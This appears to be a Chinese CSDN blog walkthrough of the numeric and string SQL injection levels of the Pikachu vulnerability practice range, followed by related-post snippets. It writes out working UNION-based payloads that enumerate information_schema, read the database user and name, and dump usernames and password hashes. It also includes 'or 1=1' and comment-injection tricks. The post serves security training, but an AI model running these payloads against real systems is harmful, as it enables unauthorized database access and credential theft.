Pikachu数字型注入、字符型注入通关详解

已于 2023-11-18 10:55:30 修改
阅读量450 收藏 2
点赞数 9
文章标签: web安全 sql 网络安全 安全
于 2023-11-16 09:24:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75816146/article/details/134433209
版权

pikachu是一个漏洞练习平台,里面包含了大部分常见的Web漏洞,非常适合新手去联系,本文将详细讲述Pikachu靶场中的数字型注入、字符型注入这2关的攻略。

数字型注入攻略

界面如图
在这里插入图片描述1.当我们看到如上图的时候,我们应该想到这应该是利用POST进行传参的,如果想找到注入点,就先得利用Bp(BurpSuite)进行抓包,然后分析包里面的内容。

错误示范:当我们利用Hackbar,在url后面添加?id=1,页面无任何变化
在这里插入图片描述利用Bp抓包,得到的包信息如图
在这里插入图片描述此时,我们将红圈标出的内容复制,粘贴到hackbar的post data选项中,我们就可以通过改变ID的值,然后就可以控制页面输出。
在这里插入图片描述

2.判断列数

id=3 order by 2

在这里插入图片描述3.判断回显位(正常操作,id应该是一个不存在的值,然后去看回显位,但是因为Pikachu靶场自身设置原因,所以可以不用设置id的值不存在)

id=1 union select 1,2

在这里插入图片描述4.爆用户、数据库

id=1 union select user(),database()

在这里插入图片描述5.爆表

id=1 union select 1,group_concat(table_name)from information_schema.tables where table_schema = 'pikachu'

在这里插入图片描述注意:

  • 在MySQL5.0版本后,MySQL默认在数据库中存放一个“information_schema”的数据库,在该库中,我们需要记住三个表名,分别是schematatablescolumns
  • schemata表存储的是该用户创建的所有数据库的库名,需要记住该表中记录数据库名的字段名为schema_name
  • tables表存储该用户创建的所有数据库的库名和表名,要记住该表中记录数据库库名和表名的字段分别是table_schematable_name
  • columns表存储该用户创建的所有数据库的库名、表名、字段名,要记住该表中记录数据库库名、表名、字段名为table_schematable_namecolumn_name
    6.爆字段
id=1 union select 1,group_concat(column_name)from information_schema.columns where table_schema = 'pikachu' and table_name='users'

在这里插入图片描述7.爆数据(密码是md5加密的,可以直接复制然后找个网站去查询就可以了)

id=1 union select username,password from users

在这里插入图片描述注:当输入id=1的时候,在后面跟上 or 1=1,可以直接爆出所有用户的数据

界面如图
在这里插入图片描述

字符型注入

1.判断是否有注入点,当在后面加一个’的时候,我们可以发现其会报sql语句错误,但当其进行注释数据 – a就能正常显示了
在这里插入图片描述在这里插入图片描述问题:这里输入的-- s是什么意思?

回答:Sql注入的本质其实就是系统对于用户输入的内容未进行过滤或者过滤不严格造成脱库的现象。比如其中sql语句是这样的

select * from username='' from user;

那么我们用户输入的内容就会被拼接到’'里面去,如果系统未过滤我们的内容,当我们输入user’的时候,sql语句就是

select * from username='user'' from user;

那么这样就是sql语句报错,而后面的-- s在传递给后端的时候,因为-- s中间有一个空格,这样就是造成sql语句里面的注释符号,这个s没有任何含义,可以是任意字符,并且–+也是同样的道理,只是–+ 在传递给后端的时候,+会被转译为空格,此时会与之前的–共同形成一个注释符,然后将这一行后面的内容注释掉。同理sql语句中,#也可以注释,#的URL编码是%23,测试如下图。
在这里插入图片描述在此我们就可以确定,这是一个单引号字符型注入。
2.判断列数
在这里插入图片描述3.判断回显位

?name=allen' union select 1,2 %23

在这里插入图片描述4.爆库、爆用户

?name=allen' union select user(),database() %23

在这里插入图片描述5.爆表

?name=allen' union select 1,group_concat(table_name)from information_schema.tables where table_schema = 'pikachu' %23

在这里插入图片描述6.爆字段

?name=allen' union select 1,group_concat(column_name)from information_schema.columns where table_schema = 'pikachu' and table_name='users'%23

在这里插入图片描述7.爆数据

?name=allen' union select username,password from users %23

在这里插入图片描述注意:同样,这些密码都是md5解密的

小小小屿屿屿
关注
  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
pikachu靶场SQL注入.docx
09-13
pikachu靶场SQL注入章节解题
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
3. 数字型注入1
08-03
数字型注入:判断列数:获取数据库名称爆破数据库 pikachu,获取数据表名称id=2 union select group_concat(distinct t
一文了解pikachuSQL注入
allintao的博客
03-01 2539
本文章主要讲解关于pikachu注入方式。目录一、数字型注入(post)二、字符注入(get)三、搜索注入四、xx注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入
pikachu字符注入
m0_58887624的博客
11-09 1725
1.字符注入吧。直接就 1' 报错了 2.存在字符注入 3. 1' order by 1# 和 1' order by 2# 返回正常 3时报错。这样就知道了,字段数为2,两列数据 4. 确定一下字段的显示位置嘛。 1' union select 1,2# 5.查一下数据库名 1' union select database(),version()# /**数据库名和版本**/ 只有数据库5.0以上的版本,才会存在i...
重现pikachu sql数字型字符注入(作业)
qq_43473164的博客
03-24 1014
重现pikachu sql数字型字符注入 本周对于sql注入有了一定的了解,我亲自在pikachu上进行了实验,以下为我的实验内容 sql数字型注入 连接数据库,这里我直接使用phpstudy集成环境. 输入 select * username,email from member where id = 1 or 1 = 1 效果如下 很明显,条件恒为真,遍历出所有username 和 emai...
pikachu靶场的字符注入(get)
ranioe的博客
12-08 3481
pikachu靶场字符注入(get) 字符注入 先找一个可以正确返回的内容 判断闭合条件 查询vince’报错 查询vince”没有报错 则说明是使用’闭合的。 把vince’构造可满足放回正确内容的语句 把vince’构造可满足放回正确内容的语句,在这个过程中可以利用and 1=1 和and 1=2 去判断是否构造成功 and 1=1 返回正常,and 1=2 查询不到用户。则说明构造成功了 查询字段数 查字段是否为2时,没有报错,查字段数是否为3时,报错。则说明字段数为2 查询回显位 语
pikachu 字符SQL注入
m0_61903602的博客
10-25 556
pikachu 靶场 sql 字符
sql注入 pikachu post数字型注入
08-12
sql注入 pikachu post数字型注入
Pikachu--字符注入(get)
最新发布
XiaoYeZhu_1314的博客
01-03 491
1' union select 1,database() # 当前数据库。输入 1' and '1'='1 正确结果 判断为字符注入。发现1和2的位置都可以正确回显,1,2地方使用联合注入。输入vince' order by 1# 返回正确。输入vince' order by 2# 返回正确。输入1' and '1'='2 错误结果。输入 vince' order by 3#解密为:123456。解密为:000000。解密为:abc123。
Pikachu靶场—sql注入通关
oiadkt的博客
03-07 4192
pickchusql注入通关
Pikachu靶场全级别通关教程详解
Innocence_0的博客
07-11 1767
Cross-site request forgrey简称为"CSRF"。在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接)然后欺骗目标用户进行点击,用户一旦点击这个请求,整个攻击也就完成了。因此CSRF攻击也被称为"one click"攻击。为什么小黑可以攻击成功呢?条件1:xxx购物网站没有对个人信息修改的请求进行防CSRF处理,导致该请求容易被伪造。因此,我们判断一个网站是否存在CSRF漏洞,其实就是判断其对关键信息(比如密码等敏感信息)的操作(增删改)是否容易被伪造。
pikachu-SQL数字型注入(post)2022,超详细
weixin_46497491的博客
09-10 1483
pikachu-SQL数字型注入(post)2022,超详细,web渗透,sql注入,渗透测试
SQL注入字符注入练习(pikachu
windStudyer的专栏
04-17 3702
SQL注入字符 实现目标:获取到pikachu下的表、数据信息 靶场:pikachu =》sql-inject=》字符注入 实验步骤 第一步目标:拿到数据库名 确定请求方法类 注:为什么需要确定请求方法??自己思考 尝试输入数据,判断请求方法类 从上可以看出,请求的方法为get类注入点在url上边,我们输入的要查询的值是abc,实际被是通过url参数name带入的。而且参数是字符。 判断注入点 从2.1知道请求方法和注入,因为是字符..
SQL注入(二):pikachu(一):MySQL字符注入(post) --- 字符注入
天威一号
10-21 505
1、判断字段 SQL命令: a' order by 1#' 查询到第3个时,显示不正常,则有两个字段; 数据库执行的命令: select * from 表名 where username = 'a' order by 1#' 2、显示占位的数字,在网页上面可以显示看到数字能够显示的内容: union联合查询中,前面的查询结果和后面的查询结果都为真的,则都会显示。如果前面的查询结果是假的,则只会显...
Pikachu靶场通关笔记--Sql Inject(SQL注入)
weixin_45908624的博客
12-09 2629
sql注入
day2 poc与exp学习之pikachu字符注入
m0_68074153的博客
07-21 306
exp
pikachu数字型注入(post)
04-10
这个问题是关于使用Python中的字母、数字和下划线命名变量的语法问题。具体来说,'pikachu'是一个以字母开头的变量名,而'\xe6\x95\xb0\xe5\xad\x97\xe5\x9e\x8b\xe6\xb3\xa8\xe5\x85\xa5(post)'可能是一个函数或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值